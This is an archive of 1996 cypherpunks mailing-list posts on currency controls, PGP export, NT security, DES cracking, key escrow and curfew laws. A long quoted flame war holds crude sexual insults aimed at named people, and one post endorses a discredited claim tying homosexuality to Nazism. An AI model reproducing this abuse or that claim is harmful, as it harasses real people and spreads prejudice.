Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 6 Oct 1996 13:35:24 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: the theory of split currency
In-Reply-To: <199609302118.OAA11208@dns2.noc.best.net>
Message-ID: <Pine.BSF.3.91.961005212826.905P-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Sep 1996, James A. Donald wrote:

> Fred Foldvary <ffoldvar@jfku.jfku.edu> wrote:
> > Is there a name for a dual or split currency, in which
> > there is one currency for domestic use and another, different
> > appearing, currency for foreign usage?
> >
> > Does anyone know of any country which has had such a
> > split currency?
> 
> Many third world nations employed this system, one currency 
> for internal use only, and one currency for international 
> transactions.  The international currency was sometimes 
> denominated in hard currency, and reasonably convertible into it.
> 

<some snipped>

> 
> I speculate that this is because people find that they *must* 
> obtain foreign currency, the internal currency being
> unspendable, and any method available to them for obtaining foreign
> currency is a criminal offense.
> 

This is just another method of a fixed exchange rate system, with the 
inevitable resulting black market for foreign currency.

Just my US$0.02 :)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 6 Oct 1996 13:38:38 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Timmy May continues to violate netiquette
In-Reply-To: <Pine.SUN.3.91.961005093522.16261A-100000@crl12.crl.com>
Message-ID: <2yscVD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May has no life.

>Date: Sat, 5 Oct 1996 09:37:32 -0700 (PDT)
>From: Sandy Sandfort <sandfort@crl.com>
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>Subject: Re: [SPAM] "Childish fool" Timmy May abuses mor(m)ons, spawns flame threads
>In-Reply-To: <N2XBVD17w165w@bwalk.dm.com>
>Message-Id: <Pine.SUN.3.91.961005093522.16261A-100000@crl12.crl.com>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>Please stop violating net etiquet (and spamming) by posting private
>e-mail messages to the list.
>
>On Sat, 5 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> Timmy May has no life.
>>
>> >Date: Sat, 5 Oct 1996 07:19:22 -0700 (PDT)
>> >From: Sandy Sandfort <sandfort@crl.com>
>> >To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >Subject: Re: [SPAM] More "fuckhead" e-mail from Timmy May and his young friends
>> >In-Reply-To: <uk5aVD10w165w@bwalk.dm.com>
>> >Message-Id: <Pine.SUN.3.91.961005071820.9224A-100000@crl5.crl.com>
>> >Mime-Version: 1.0
>> >Content-Type: TEXT/PLAIN; charset=US-ASCII
>> >
>> >Please stop spamming the list.  It is rude and disrespectful to
>> >all list members.  It makes you look like a childish fool.
>> >
>> >On Fri, 4 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>> >
>> >> Timmy May has no life.
>> >>
>> >> >From: Troy Varange <varange@crl.com>
>> >> >Message-Id: <199610050215.AA00807@crl5.crl.com>
>> >> >Subject: Re: [VULIS]
>> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >Date: Fri, 4 Oct 1996 19:15:36 -0700 (PDT)
>> >> >In-Reply-To: <FV67uD8w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Oct 2, 96 08:29:14 pm
>> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >Mime-Version: 1.0
>> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >Content-Transfer-Encoding: 7bit
>> >> >Content-Length: 7527
>> >> >
>> >> >>
>> >> >> I have no dog, nor any other pets.  Timmy May (fart) reportedly has two cats.
>> >> >> If you suspect that Timmy May (fart) sexually abuses his cats, or any other
>> >> >> animals, you should promptly contact the ASPCA and also alert rec.pets.cats.
>> >> >>
>> >> >> (Frankly, I doubt that the old fart can get his dick up to sexually abuse
>> >> >> anything, including his cats. Senility puts an end to sexual molestation.)
>> >> >>
>> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >Message-Id: <199610021931.AA24883@crl11.crl.com>
>> >> >> >Subject: Important
>> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >Date: Wed, 2 Oct 1996 12:31:21 -0700 (PDT)
>> >> >> >In-Reply-To: <gqH3uD93w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 30, 96 07:57:27 am
>> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >Mime-Version: 1.0
>> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >Content-Length: 6226
>> >> >> >
>> >> >> >Dr. Vulis sucks his dog's butt.
>> >> >> >
>> >> >> >> Timmy May has no life.
>> >> >> >>
>> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >Message-Id: <199609300441.AA10704@crl12.crl.com>
>> >> >> >> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
>> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT)
>> >> >> >> >In-Reply-To: <LJV2uD91w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm
>> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >Mime-Version: 1.0
>> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >Content-Length: 5298
>> >> >> >> >
>> >> >> >> >Vulis sucks Timmy's boyfriend's cock.
>> >> >> >> >>
>> >> >> >> >> Timmy May has no life.
>> >> >> >> >>
>> >> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >> >Message-Id: <199609300332.AA09870@crl12.crl.com>
>> >> >> >> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>> >> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>> >> >> >> >> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>> >> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >> >Mime-Version: 1.0
>> >> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >> >Content-Length: 4378
>> >> >> >> >> >
>> >> >> >> >> >>                    berserk
>> >> >> >> >> >> Timmy May has gone        . Has he been eating speed?
>> >> >> >> >> >>                    bananas
>> >> >> >> >> >>
>> >> >> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >> >> >> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >> >> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >> >> >> >> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >> >> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >> >> >Mime-Version: 1.0
>> >> >> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >> >> >Content-Length: 3442
>> >> >> >> >> >> >
>> >> >> >> >> >> >>
>> >> >> >> >> >> >> What has Timmy been smoking?
>> >> >> >> >> >> >>
>> >> >> >> >> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> >> >> >> >> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> >> >> >> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> >> >> >> >> >> ]	for dlv
>> >> >> >> >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> >> >> >> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> >> >> >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> >> >> >> >> >> ]          29 Sep 96 15:59 BST
>> >> >> >> >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> >> >> >> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> >> >> >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> >> >> >> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> >> >> >> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> >> >> >> >> >> ]From: paul@fatmans.demon.co.uk
>> >> >> >> >> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> >> >> >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> >> >> >> >> >> ]Mime-Version: 1.0
>> >> >> >> >> >> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> >> >> ]Content-Transfer-Encoding: 7BIT
>> >> >> >> >> >> >> ]Subject: Re: Possible subs attack????
>> >> >> >> >> >> >> ]Priority: normal
>> >> >> >> >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> >> >> >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> >> >> >> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]Fuck you,
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> >> >> >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> >> >> >> >> >> ]don`t sign keys here and there without checking ID`s...
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]Type Bits/KeyID    Date       User ID
>> >> >> >> >> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> >> >> >> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> >> >> >> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> >> >> >> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> >> >> >> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> >> >> >> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> >> >> >> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> >> >> >> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> >> >> >> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> >> >> >> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> >> >> >> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> >> >> >> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> >> >> >> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> >> >> >> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> >> >> >> >> >> ]=CMZA
>> >> >> >> >> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]-----BEGIN PGP SIGNATURE-----
>> >> >> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> >> >> ]Charset: cp850
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> >> >> >> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> >> >> >> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> >> >> >> >> >> ]2Wqa5+h8R7g=
>> >> >> >> >> >> >> ]=/M2U
>> >> >> >> >> >> >> ]-----END PGP SIGNATURE-----
>> >> >> >> >> >> >> ]
>> >> >> >> >> >> >> ]  Datacomms Technologies web authoring and data security
>> >> >> >> >> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> >> >> >> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> >> >> >> >> >> ]       Http://www.cryptography.home.ml.org/
>> >> >> >> >> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> >> >> >> >> >> ]     "Don`t forget to mount a scratch monkey"
>> >> >> >> >> >> >>
>> >> >> >> >> >> >Fuckhead.
>> >> >> >> >> >>
>> >> >> >> >> >Fuckhead.  We know your behind Vulis, Cock-sucker
>> >> >> >> >>
>> >> >> >> >and he swallows
>> >> >> >>
>> >> >> >
>> >> >>
>> >> >Fuckhead.
>> >>
>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 6 Oct 1996 14:26:24 +0800
To: "Greg Broiles" <deviant@pooh-corner.com>
Subject: Re: Fw: Re: ITAR satellite provision
Message-ID: <19961006044138000.AAA193@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 5 Oct 1996 05:43:39 -0400 (EDT), The Deviant wrote:

>> >So.. if I were to take PGP, put it on a floppy disk, tape it to a model
>> >rocket, and launch it across the mexican border, that's not exporting it
>> >(although the FAA might complain)?

>> As I read the regs, it's not an export at the moment it's launched, but
>> it's almost certainly an export when it reaches Mexican airspace or when it
>> touches Mexican soil.

>Well now, I didn't send it accross the border.  I sent it up.  wind sent
>it accross the border.

That's kind of like saying "I didn't export PGP, I just handed a diskette to
my Iraqi friend at the airport as he left - what he did with it is his
responsibility"

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 6 Oct 1996 12:54:34 +0800
To: cypherpunks@toad.com
Subject: Re: "Mormon Asshole?"  re: GAK
In-Reply-To: <199610040846.CAA00681@infowest.com>
Message-ID: <ogTcVD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> writes:
...
>         Dimitri, try reading a balanced analysis of the LDS faith, the
>     teachings, and their accomplishments before you jump off and prove
>     your ignorance and bigotry...
...

Well - I have a very different opinion of all religions in general and
your criminal cult in particular, and I think we'll just have to agree
to disagree. We have nothing to gain by debating the virtues of LDS any
further - and if we did, we should do it on alt.religion.mormon or on
soc.religion.mormon moderated, not on this mailing list.

There's an asshole named Timmy May who started this flame thread, and
many others like it. Timmy has nothing to contribute to the cryptography
discussions, so he entertains himself by attacking various people and
their religious views and watching the resulting flame wars.

I suggest that in the future we all ignore Timmy's flame bait.
Just killfile the asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 6 Oct 1996 14:53:25 +0800
To: "jfricker@vertexgroup.com>
Subject: RE: WINDOWS NT ????
Message-ID: <19961006044857578.AAA115@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 05 Oct 1996 07:57:22 -0700, John Fricker wrote:

>>Microsoft claims C2 or higher for NT and deserves any ragging they get if
>>it's not.   Ditto for any other vendor who claims one thing and sells
>>another.

>You ought to read about C2. 
>DIdn't Steve Martin say something like "criticize things you don't know about".

Okay, correct me if I'm wrong on this (as if you wouldn't...):
1. Microsoft markets NT with C2 security
2. Numerous industry magazines report that you can bypass NTFS file security
by booting
    off of a diskette and using NTFSDOS.
3. Numerous industry magazines (and I believe MS finally mentioned it in some
routine status
     update) all say that NT should now be considered C2 *ONLY* on machines
w/o floppy 
     drives.

Sounds like they weren't quite honest on this one.  Or are you trying to say
that security-by-obscurity (relying on NTFS's then lack of external mounting
programs) was a good choice?

>>BTW:  Bizarre NT Quirk #15413 -  The Administrator account does not have
>>access to the entire disk.  You got it - if you're the administrator you
>>still cannot look into certain directories belonging to another user - even
>>if you've given all access privileges to the Admin account.  Got a few
>>chuckles at work.

>It's not rocket science to defeat this. The administrator is prevented from casually peering >into user owned directories but any administrator worth a nickle can tap tap click and have >access to any directory. 

I know that you can get in there.  It just seemed odd that it would be setup
by default...


#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 6 Oct 1996 14:58:14 +0800
To: "jcr@idiom.com>
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <19961006045736515.AAA164@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 5 Oct 1996 15:55:42 -0700 (PDT), John C. Randolph wrote:

>What's really sad is the way that every cult member tries to convince
>himself that *his* franchise has more to offer than Lifespring,

Food for thought:  suppose he didn't - why would any rational individual
follow a religion he thought was wrong?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sun, 6 Oct 1996 12:54:51 +0800
To: cypherpunks@toad.com
Subject: Re: Can we kill single DES?
Message-ID: <Pine.OSF.3.91.961005213432.4115A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain




>From: Adamsc@io-online.com (Adamsc)
>To: "Adamsc" <Adamsc@io-online.com>, "Lucky Green" <shamrock@netcom.com>
>Cc: "cypherpunks@toad.com" <cypherpunks@toad.com>
>Date: Sat, 05 Oct 96 00:05:11 -0700
>Subject: Re: Can we kill single DES?

. . . snip . . .

>I guess that was kind of ambigous.  What I meant was any protocal/system
>where money is changing hands protected only by DES.   That's what I 
>meant by
>"like digicash".   I don't even know if such a beast exists, but was
>suggesting that anything involving weakly protected money would be a good
>target because it highlights the vulnerability and would get media 
>attention. -
>#  Chris Adams <adamsc@io-online.com>   | 
>http://www.io-online.com/adamsc/adamsc.htp
>#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
>"That's our advantage at Microsoft; we set the standards and we can 
>change them."
>   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review 
>editorial)
>

I think any protocol even similar to one used in a financial type 
transaction, protected by DES would be a good target.  The press 
could say that DES, the same algorithm used to protect financial 
transactions, has been broken.  

Hal Finney provided the target data in the last couple of these
distributed cracks, I believe. 

Sounds like there needs to be much more involvement in this one,
because of the number of cycles required.  The doling out of keys
will be a bigger job, also.  If a 100 Mhz Pentium takes 4133 years,
then I guess 4133 Pentiums takes 1 year.  One year is too long to
prove the point of weakness.

------------------------------------------
To unsubscribe, send to majordomo@toad.com
unsubscribe cypherpunks
in the message body, not the subject line.
Note: Don't send to list (Perry-gram risk!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 6 Oct 1996 12:58:59 +0800
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610052255.PAA08964@idiom.com>
Message-ID: <55TcVD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"John C. Randolph" <jcr@idiom.com> writes:
(a bunch of hate-filler nonsense)
> Lubbavitcher, or any other cult.

That's "Lubavicher". (A number of my close relatives are.)

> Hitler started with the gays.

That's a pretty ambiguous statement. Are you saying that disproportionately
many of Hitler's supporters were homosexual, and that homosexuality permeated
Nazi ideology (the facts that the "politically correct" historians are trying
to suppress, as documented in the book _The Pink Swastika_)?

This religious war thread, started by Timmy May, has nothing to do with
cryptography. Take it (and Timmy) elsewhere, please.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 6 Oct 1996 15:15:31 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Sun's GAK position
Message-ID: <199610060521.WAA10177@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 10/4/96 -0500, Frank Stuart <fstuart@vetmed.auburn.edu> wrote:
>I haven't been able to find a position statemnet from Sun Microsystems about
>the new GAK plan, but it looks like I did find a position.  This is from
>"http://www.sun.com/corporateoverview/CorporateEmployment/LISTINGDIR/JobDet
ailAUF971004.html":
.....
>>Extensive Security and Cryptography knowledge and skills, ability to
>>authoratatively present and advocatae security technologies at technical and
>>public policy levels, confidence and skill at writing and presenting
>>security documents and presentations. specific knowledge of government
>>security requirements. A US Government Top Secret SCI and potentially other
>>clearances will be necessary for this position.
etc.

That's not looking for someone to do GAK work at Sun; that's just looking for
someone to help Sun sell stuff to the Feds.  They've been doing secure
operating system support and selling Suns to the NSA, Pentagon,
and everybody else for years.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 6 Oct 1996 15:02:48 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: RSA's Official Permission
Message-ID: <199610060521.WAA10181@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   REDWOOD CITY, Calif.---Oct. 2nd, 1996--RSA Data Security, Inc., a
>   wholly-owned subsidiary of Security Dynamics Technologies, Inc.
>   (NASDAQ: SDTI), issued the following comments on the administration's
>   recent announcement of a Key Recovery Initiative:
        [rave reviews deleted....]

I wonder how much being bought by SDT has influenced their positions?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 6 Oct 1996 13:26:34 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
In-Reply-To: <9610060035.AA16882@su1.in.net>
Message-ID: <36ucVD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby <frankw@in.net> writes:
>
> To Mormons:
> First, Mormonism has nothing to do with cryptography & therefore, has
>  no place on this list.
> Second, CP is not what I would consider to be an appropriate atmosphere
>  for proselytizing.
>
> To Non-Mormons:
> First, Mormonism (or any other religion for that matter) has nothing to
>  do with cryptography & hence has no place on this list.  Let's stick to
>  the subject, please.

Hear, hear. The whole flame war was started singelhandedly by Timmy May who
posted some flame bait/personal attacks, as he had done many times before.

> Last, but not least, I think this list has some great material and offers
> tremendous food for thought.  However, I for one would get a lot more out
> of this list if the Signal to Noise ratio were a little better.  Personally,
> I find that the petty personal attacks and profanity detract from the subject
> at hand and tend to reduce the author's credibility.

Hear, hear.  Timmy May has no credibility.  Just ignore everything he says,
since none of it has anything to do with cryptography.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 6 Oct 1996 17:07:34 +0800
To: attila@primenet.com
Subject: Statism/Theocracy What's the difference--LDS
In-Reply-To: <199610050036.SAA23740@infowest.com>
Message-ID: <199610060611.BAA00274@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Attila said:
> In <v03007808ae7af10d0afb@[207.167.93.63]>, on 10/04/96 
>    at 09:03 AM, "Timothy C. May" <tcmay@got.net> said:
>         Frankly, we do not wish curfews, and there never were curfews 
>     before the immense immigration into the area, mostly from So. CA,

>         However, these people, Mormons (some good, some inactive) and

          (inactive=bad?)

>         well, that prompted the curfew, but they found it also 
>     maintained the semblance of peacful family oriented community
>     among the lost and alienated families --so it is apparently here
>     to stay.  other than the fact we are telling tparents who do not 
>     wish to manage their children they must keep them home or take them
>     somewhere, what does the law do? 

<snip>

> -.Telling people when they
> -.can be on public streets and when they cannot is no different than telling
> -.them what they can read and what they cannot.
>         that was my initial reaction -you wouldn't tell me that!  but 
>     consider the right of society to legislate and  regulate in the 
>     common good, despite both my and your abhorence of law in an of
>     itself.  
     
GAK is for the "common good", after all, it is only the people who are
doing wrong that will be hurt by having their data scanned by the Government,
it is just maintaining decency standards.  
> 
>         it is an effective means of forcing parents who do not seem to 
>     care, or parents who wish to shift their responsibilities to social
>     workers who are not available, they have a responsibility.  what
>     happens to the violators --few are arrested, they are asked to go
>     home. there is no great wild-west roundup of teenaged cattle! any
>     who resist or commit minor vandalism are taken to the center --but,

     For most of my life I have had insomnia, and when I was in my early
to mid teens, I used to wait until my parents had gone to sleep, and 
go out and wander the neighborhood, Mostly alone, sometimes until 2 or
3 in the morning (during the summer, not when I had to be at school).

     Why _shouldn't_ I be allowed to do this? In my case, it was against 
my parents wishes, but I still harmed nothing, commited no crime (there 
was no curfew where I lived). My father almost caught me (he knew I did it
from time to time, but figured as long as I wasn't causing trouble, he 
wouldn't be able to stop me). Just because other children cause trouble, why
should _mine_ be restricted? Just because it gives the APPERANCE OF MORALITY?

     I'll say that again, THE APREARANCE OF MORALITY. Forcing someone to 
follow a given set of rules doesn't make that person moral, it makes them 
a slave. Morality only comes in when there is choice. 

     Also, the waters are calm on the surface, but what about underneath? 
What is going on behind closed doors? Here in the outerworld, we have 
fornication on the streets, but we know who is doing it, we _know_ who the 
problems are. Do you?   

>         unlike every other city I have seen, they do not mix the 
>     'miscreants' with the juvenile delinquents, repeat offenders, and 
>     the teenagers who are obviously on their way to the dead end.

     Almost all teenagers are on their way to a dead end. It is called 
"Adulthood", which if you look at it a certain way looks a lot like 
A Dolt Hood. 

     I don't necessarily think it is a bad idea to mix kids (mid to late 
teens) picked up for "real" crimes in with "real"  criminals, but then
I don't think that staying out late should be a crime. 

     Fear can be a powerful motivator.  

>         what is the penalty?  call their parents for a ride home.  they
>     are not fingerprinted and mugged, etc.  very few are required to
>     even see a social worker.  consistent repeat offenders eventually
>     enter the system --as they should.

     Really, I should be in "the system" because I like wandering around at
night? 
  
     Real libertarian of you. 

> -.I still urge Attila to rethink his enthusiastic support of state-enforced
> -.curfews, or state-imposed bans on alcohol (not that I recall him supporting
> -.this particular law), etc.
>         actually, the curfew laws are local laws, and I reluctantly
>     decided to support curfew laws for minors after looking at the
